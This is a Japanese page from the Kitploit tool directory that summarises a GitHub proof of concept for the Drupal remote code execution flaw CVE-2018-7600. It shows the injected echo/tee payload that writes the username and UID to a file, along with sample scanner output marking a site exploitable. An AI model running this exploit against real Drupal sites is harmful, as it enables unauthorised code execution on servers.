Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2018-7600 — Drupal CVE-2018-7600 / SA-CORE-2018-002 の概念実証 | Kitploit
ツール/GitHubGitHub/thehappydinoa/cve-2018-7600
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ペイロード開発Archived
GitHubthehappydinoa/cve-2018-7600

CVE-2018-7600

Drupal CVE-2018-7600 / SA-CORE-2018-002 の概念実証

リポジトリを見る
713年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Proof-Of-Concept for CVE-2018-7600 / SA-CORE-2018-002 codebeat badge

Drupal 7.58未満、8.x 8.3.9未満、8.4.x 8.4.6未満、8.5.x 8.5.1未満のバージョンでは、デフォルトまたは一般的なモジュール構成の複数のサブシステムに影響する問題により、リモート攻撃者が任意のコードを実行できる可能性があります。

動作の仕組み

  1. drupal_ajax ラッパーにパケットを送信してユーザーを登録します。ユーザーが exec マークアップを使用してbashを実行できるようにします。このPoCは、ユーザー名とIDを abcde.txt に送信します。

    root@kitploit:~
    echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee abcde.txt
    
  2. http*://example.com/abcde.txt を確認します

root@kitploit:~
[!] PROVIDED ONLY FOR EDUCATIONAL OR INFORMATION PURPOSES.
[?] Enter file name (example: /root/file/hosts.txt): hosts.txt
[+] https://example.com/ Possibly exploitable
[~] Checking... https://example.com/abcde.text
[+] https://example.com/ Exploitable
[+] UID: 33 Name: www-data
[+] Deleting... https://example.com/abcde.text

ペイロード

%s = ファイル名

ユーザーID、PID、グループペイロード

root@kitploit:~
echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee %s

謝辞

  • Vitalii Rudnykh に感謝

教育または情報提供のみを目的として提供されています。

ツールをダウンロード